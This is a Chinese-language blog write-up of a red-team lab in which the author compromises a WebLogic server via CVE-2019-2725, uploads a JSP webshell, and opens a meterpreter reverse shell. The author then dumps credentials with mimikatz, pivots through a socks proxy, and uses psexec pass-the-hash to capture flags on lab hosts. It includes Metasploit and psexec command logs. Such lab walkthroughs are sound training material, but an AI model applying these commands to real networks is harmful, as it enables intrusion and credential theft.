ATT&CK实战系列——红队实战(二)

问就是WEB不会了。觉得域渗透挺好玩的。下来试试


为了模拟真实环境,用了frps转发到公网。进行域渗透

打开后发现环境是WEBlogic。之前听说过其cve。查询

用WeblogicScan扫描漏洞发现CVE-2019-2725、CVE-2019-2729

使用DeserializeExploit.jar

可以直接执行命令

上传webshell

这里是上传目录找了很久。。

最后上传目录是C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\5f6ebw\war\shell1.jsp

上传shell,链接

在桌面找到第一个flag

然后进行域渗透。反弹shell到本地(这里反弹shell疯狂失败我吐了)

成功拿到shell,这里说明一下,冰蝎给的msf反弹shell过时了,现在为java/meterpreter/reverse_tcp

哦,火绒给我拦截了。。。


测试了半天发现远程的web端有360。所以尝试用dozer的方法dump内存

本地mimikatz读取内存

可以发现我们拿到了一些用户和密码

上传reGeorg-master

远程桌面连接

通过ipconfig可以得到该机器IP为10.10.10.80

这里如果shell cmd乱码请输入 chcp 65001 设置成UTF-8编码

发现远程没有允许本用户远程连接,所以新建一个用户然后加入管理员组

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lport 1234
lport => 1234
msf5 exploit(multi/handler) > exploit

[-] Exploit failed: The following options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) > set lhost 0.0.0
[-] The following options failed to validate: Value '0.0.0' is not valid for option 'LHOST'.
lhost => 
msf5 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 0.0.0.0:1234 
[*] Sending stage (53906 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:1234 -> 127.0.0.1:36810) at 2020-07-09 16:02:18 +0800

meterpreter > shell
Process 1 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Oracle\Middleware\user_projects\domains\base_domain>chcp 65001
chcp 65001
Active code page: 65001

C:\Oracle\Middleware\user_projects\domains\base_domain>net user ha1c9on ha1c9on /add
net user ha1c9on ha1c9on /add

发现被360拦截了。。淦

继续寻找方法登录

后来想起来我已经有域控密码了 proxy直接上代理就行

还是寻找如何登录,发现域控主机是10.10.10.10

所以直接代理登录

拿到第三个flag

那么现在还有一台机器没有拿到了

直接设置socks4代理,一把梭

msf5 exploit(multi/handler) > use auxiliary/server/socks4a

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.10.10.0/255.255.255.0...
[+] Added route to 10.10.10.0/255.255.255.0 via 127.0.0.1
[*] Use the -p option to list all active routes
meterpreter > background
[*] Backgrounding session 1...
msf5 auxiliary(server/socks4a) > set srvhost 0.0.0.0 
srvhost => 0.0.0.0 
msf5 auxiliary(server/socks4a) > set srvport 1234 
srvport => 1234 
msf5 auxiliary(server/socks4a) > run
meterpreter > run autoroute -s 10.10.10.0/24

msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 2.

[*] Starting the socks4a proxy server
[*] Stopping the socks4a proxy server
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.10.10.0/255.255.255.0...
[+] Added route to 10.10.10.0/255.255.255.0 via 127.0.0.1
[*] Use the -p option to list all active routes
meterpreter > background
[*] Backgrounding session 1...

psexec.py一把梭

root@ha1c9on:~/桌面/impacket-master/examples# proxychains psexec.py -hashes :161cff084477fe596a5db81874498a24 DE1AY/Administrator@10.10.10.201
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation

[proxychains] Strict chain ... 127.0.0.1:1234 ... 10.10.10.201:445 ... OK
[proxychains] DLL init: proxychains-ng 4.14
[*] Requesting shares on 10.10.10.201.....
[*] Found writable share ADMIN$
[*] Uploading file aQMLAGVC.exe
[*] Opening SVCManager on 10.10.10.201.....
[*] Creating service SHqv on 10.10.10.201.....
[*] Starting service SHqv.....
[proxychains] Strict chain ... 127.0.0.1:1234 ... 10.10.10.201:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1234 ... 10.10.10.201:445 ... OK
[!] Press help for extra shell commands
[proxychains] Strict chain ... 127.0.0.1:1234 ... 10.10.10.201:445 ... OK
Microsoft Windows [░µ▒╛ 6.1.7601]
░µ╚¿╦∙╙╨ (c) 2009 Microsoft Corporationíú▒ú┴⌠╦∙╙╨╚¿└√íú

C:\Windows\system32>chcp 65001

chcp 65001
Active code page: 65001

C:\Windows\system32>dir c:\users
Volume in drive C has no label.
Volume Serial Number is B883-EBAA

Directory of c:\users

2019/10/20 18:04 <DIR> .
2019/10/20 18:04 <DIR> ..
2019/10/20 18:04 <DIR> administrator
2019/09/09 10:09 <DIR> de1ay
2019/10/20 18:00 <DIR> mssql
2011/04/12 15:28 <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 51,341,246,464 bytes free

C:\Windows\system32>type c:\users\mssql\desktop\flag.txt
flag{test_flag2}

做完感觉还是蛮简单的,比较基础

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

Protected with IP Blacklist CloudIP Blacklist Cloud